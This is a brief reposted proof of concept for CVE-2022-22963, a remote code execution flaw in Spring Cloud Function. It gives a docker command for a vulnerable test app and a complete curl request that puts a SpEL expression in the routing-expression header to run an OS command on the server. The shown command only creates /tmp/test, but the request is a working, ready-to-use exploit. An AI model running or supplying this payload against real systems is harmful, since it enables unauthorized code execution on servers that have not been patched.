CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
2022-3-31 19:30:0 Author: www.kitploit.com(查看原文) 阅读量:87 收藏

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:

docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Curl command:

curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

Or using Burp suite:

Credits

https://github.com/hktalent/spring-spel-0day-poc

CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability Reviewed by Zion3R on 8:30 AM Rating: 5


文章来源: http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html
如有侵权请联系:admin#unsafe.sh